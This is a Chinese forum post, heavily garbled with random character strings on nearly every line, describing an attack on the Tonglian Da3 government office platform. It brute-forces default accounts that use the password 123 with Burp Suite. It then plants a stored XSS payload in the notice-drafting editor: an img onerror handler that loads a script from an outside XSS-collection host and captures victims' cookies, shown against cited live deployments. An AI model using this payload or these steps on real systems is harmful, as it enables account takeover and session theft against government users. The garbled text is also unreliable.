- Y' d B) ^0 f! [# V% q
+ c0 G' Z2 f O" q1 d% q 同联Da3协同办公平台后台通用储存型xss漏洞: T' T/ P. {+ Z& u [2 T5 r
. k6 d/ L2 G. D h2 c I/ @ : t s) H. l% L/ U6 |+ ]
平台简介:4 E7 z% d2 b* b" k! S& r+ [7 E
; v% \- F! V+ B3 ~ [0 v* S4 y
8 F5 m `7 o1 I- F9 L / }% \0 g" K! v* V, L3 A, D- r2 y
) {1 V* i2 z1 |- u / X. W. p; |* s I' L' _
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 L0 m% z) h# y+ f& ~' A/ r同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) d. o' b7 \' W2 j8 Y8 l
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, g, ~; t ^' R6 y
5 W2 b4 V! ]# R$ p6 L5 ~
. B3 z( U9 }" N# L* h3 D9 K ; y8 j( I V3 `9 s
5 D. V5 q$ h8 O1 D1 V% t1 {
/ O, B. @- L" N* F7 O& L 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
& B, l. w; A: _& W6 h; V# z
. c5 a0 h9 i. x0 K# C$ {! ^8 V
( |& i' l" P5 g( V+ n8 f
, ]# m5 u3 \3 d( u* S
* @- N. {; s" a . k$ ?5 ~7 G3 K9 X$ Z6 E0 S
http://1.1.1.1:7197/cap-aco/#(案例2-)1 C% z4 A# p1 ~& q3 ~+ \7 R
7 ]& ]$ E& y4 e0 _ . E: `. K& \* J& J1 `8 ?
http://www.XXOO.com (案例1-官网网站), E+ {/ k7 ? h' L" E2 ^/ H d
6 H/ u1 K' B; g2 I6 j+ E6 Y' ` - z! m+ N `4 B1 z) }
漏洞详情:. u+ e0 L* w" F9 v
5 ~/ X+ _- Q5 g6 _: d; @, g * S6 Y! U' W e( w. ^
案例一、* [) y/ s8 H5 a- y
2 W6 J6 w @2 b% R4 v
. D) A7 j4 q" p' {
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 O+ P% k$ h6 x( u
/ m- w# u. }9 V
6 X* \ I/ |# P+ L, f 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:1 H0 h+ l' p$ {$ n, Z
, O1 {- M; @1 n8 F- V
$ l' ]9 e' f5 `9 D; p . A+ W5 z$ w, O/ o/ }
. ~3 i3 g+ W; |# q4 ]& J, T
* L# m% l5 ~7 O7 s- k 
3 O9 L2 E4 g S9 W
: d. H, a6 x" I: u i* e# y7 M
/ P! c" W% l( _9 H# D status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 2 \' r. H) b: X1 I+ y
% k1 d9 C2 `+ m- C* D
* b6 s8 n0 i4 W! _ ?! _0 ?" P 2 o" q' ?4 {( b2 C8 ^3 l
+ G6 K9 o4 U& P! p( W& b; u o 4 D9 b7 t& {' ?% F% l P
/ Y' t/ R o2 L! ~
2 R, ^9 h5 {9 V- v' G. `& H
; S# E5 a. w: }! R! l 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 j, W0 y' [# R; G! e( l: Z
$ J+ g" C: L3 Z, A3 K3 g _
, r+ @) v6 I9 r9 c; L! @/ x; t; I. ^
h2 c0 T: d; x
5 }/ h7 G! E% A8 p) i$ y# I : Q7 H$ S- S1 e/ p' E
<img src=x4 Q$ V% w5 L* s! p( G
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 2 N6 y! S4 G+ _' s
. O9 `. x1 M# w' Z
3 A8 M* ]8 l t9 }9 O, r4 v7 [3 D 
; Q* q* m+ g5 v$ M' |6 w; V
8 I; g. }- X; K z! G$ \8 ]8 P " W8 Q: \1 v' i& L( C1 {+ e
然后发送,接收cookie如图:
9 d2 e3 Q: e* d/ j2 D+ l
( |5 r; m- z" d5 k% J% ~6 i, H0 _; a / u1 S# ~. E! D: Y/ r8 Q2 C
; y& r% ` F9 p
+ K5 W. H* G3 f8 v
! B( N" C7 a- E' h2 ?: N# O5 f ; z8 B5 l* j1 k) {
+ y ? B. z& a$ f: P. l/ o Z& O5 f5 n! M
) F" x) |- b+ ]) R, G' ]
$ P+ G) B3 z8 Y( R d3 d! a! t$ B % s% L* ~, e9 s+ L0 n8 {# Z1 h; }
1 q9 T2 d; o3 ?; D/ w
. m1 D9 y k- l" E
& P* J4 A" z; W1 U9 F# F4 {$ k6 \
. b; Y5 O) T. o. Q. W" H$ |$ z
7 _- ] ^* {: j5 c8 @
8 ?7 p0 s% E* @# {( a 
6 G6 `+ Z( d% ^. q
9 Z) O4 f0 D& U/ v5 N- ?
7 S1 {. A7 O) H! @- E4 }
! ^1 X5 }( C; ]& v4 g0 G0 N6 e
: _6 n- ]9 c; e
) e% i+ n J5 w$ a$ N 案例2、 0 L9 W7 w6 n8 ?/ f8 L
# A' q& W% d$ J% z
: V* M' d2 R( h, d6 x% u9 T
前面步骤都一样,下面看效果图: 5 [+ M& J" C9 n4 ~% V7 [( a
; g/ k b; @' ?- [- f8 L
! U9 L! C! A P& S5 e2 j
! f0 ?/ z: v& _9 v9 a; t/ v5 ~, P; o
9 e3 E3 g9 _, e+ g, y. Y0 i, C0 ~0 S
4 m @+ E+ E; u+ j& G, D
4 W; @3 P; F, f: d1 W {/ g |
1 z7 x* a ]3 |# V" ?4 Q; U
/ P' x1 h! S. Y) M5 c0 o, h# \
~2 o6 p1 C5 {4 O) E
5 G0 D8 U5 O0 z6 b3 t
( v6 V; i* J7 n+ m5 B # U1 L. b) _% ]; L1 `# i9 i* ^& c
7 m6 W1 o' e( r8 V
4 g9 a* }1 V1 B4 J 
! Q) `4 m8 h! Z( N1 _, P0 S
* ^$ I* E. f# U. z0 c: F: ?. N, d * d1 b1 D$ Q# h& f1 U1 O3 U* a4 c
9 }- Q' Q; O$ u$ S2 e
4 M5 S2 Y' ~# Y) t k1 S! t- T 4 O# z1 I: b. ^
7 \+ D9 f0 c3 _1 R1 F% V- h) ^
& M# }% }. d6 K& l" D
: `3 D7 v) x+ `) P6 W: F( P' f
6 z m5 G' ?: y# J' T3 A4 H% J3 b
* ^& k7 ^; ]! F5 {: u% O
, L; I1 s+ i* X9 o- F6 f
6 k% _0 a8 T! Q' F4 r6 F
# T- n# c9 U8 k" K$ N. P/ r
发表于 2018-10-20 20:14:15
收藏
分享
支持
反对